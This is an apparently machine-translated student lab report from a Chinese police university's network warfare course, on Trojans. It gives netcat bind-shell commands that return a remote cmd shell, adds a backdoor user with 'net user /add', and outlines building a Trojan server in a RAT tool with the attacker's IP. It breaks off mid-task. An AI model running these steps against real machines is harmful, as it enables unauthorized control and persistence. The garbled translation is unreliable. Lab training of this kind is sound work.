Experiment 4 - Trojans

Chinese People's Public Security University

Chinese people’ public security university

Network Warfare Technology

experimental report

Experiment 4

Malicious code technology

student name	Liu Yunzheng
grade	2017
District Team	Net 17 4
mentor	Your opinion

Information and Network Security Technology College

201 6 Nian 11 Yue 7 Ri

Master experimental task

20 1 6 -20 1 7 grade Dai Ichi semester

First, the purpose of the experiment

1. With practice for the Trojans, so that readers understand and master the Trojans spread and mechanisms of operation; manually delete the Trojan, the Trojan checks to grasp and remove Trojans skills, learn Trojan defense-related knowledge, enhance awareness of security for the Trojans.

2. Understand and are familiar with common network attack tools, the basic functions of Trojans;

3. The purpose of the consolidation of curriculum knowledge and practical application.

Second, the experimental requirements

1. Carefully read the contents of each experiment, we need to capture the title, to be clear screenshots and annotate screenshots and descriptions.

2. Documentation Requirements clear structure, graphic expression accurate labeling specifications. Reasoning was objective, reasonable and logical.

3. Software tools are available NC, MSF and so on.

4. After the experiment, to retain electronic documents.

Three , experimental procedures

1. ready

Experimental preparation well in advance, should learn more about the purpose of the experiment, test requirements and test content before the experiment, familiar with the software tools and ready with a good experiment, in accordance with the requirements of experimental content and experimental content ready ahead of time.

2. lab environment

Describes the hardware and software environment used in the experiment (including a variety of software tools);

Office2003 boot and start the software or 2007, browser, encryption and decryption software.

3. experiment procedure

1) Start the system and start-up tool environment.

2) realization of experimental content using software tools.

4. experimental report

Write lab reports in accordance with the standard requirements of the test report format. The document prepared in accordance with the format template embedded test report document, the document written in accordance with the provisions of the written format, the form must be said that the graphics have a table Illustrated.

Task one: the use of NC control computer

Victim computer's IP address: 192.168.126.130

Attacker computer's IP address: 192.168.126.128

Screenshot: Slightly

1, enter the following command in the victim's machine
　　nc.exe -l -p port -e cmd.exe enter a listening mode

Listening state refers to a state in which the network server program, in this state, the server program waits for a client link

Figure that enter the listening mode, has been flashing that enter

Enter the following command attacker machine:
　　NC // Port IP connection victim_IP, then get a shell. (192.168.126.130)

the shell, the shell means is often refer to another interface or operating mode of the system.

In the shell, using the net user username password / add, add a user, and use the net user command to verify the victim's machine.

FIG completion of a task, the computer control by NC

Task two Trojans control the use of computer

The attacker's machine open V2014.exe program or the star RAT, similar to the two Trojan functionality. I opened a star rat.

Step two:
　　Click on the menu bar of the "service generated" in the pop-configuration server, the configuration back to even the IP address (the attacker IP) and port number , and click the "Generate" button to generate a Trojan server.

FIG client has configured, and then compressed with a compression movement past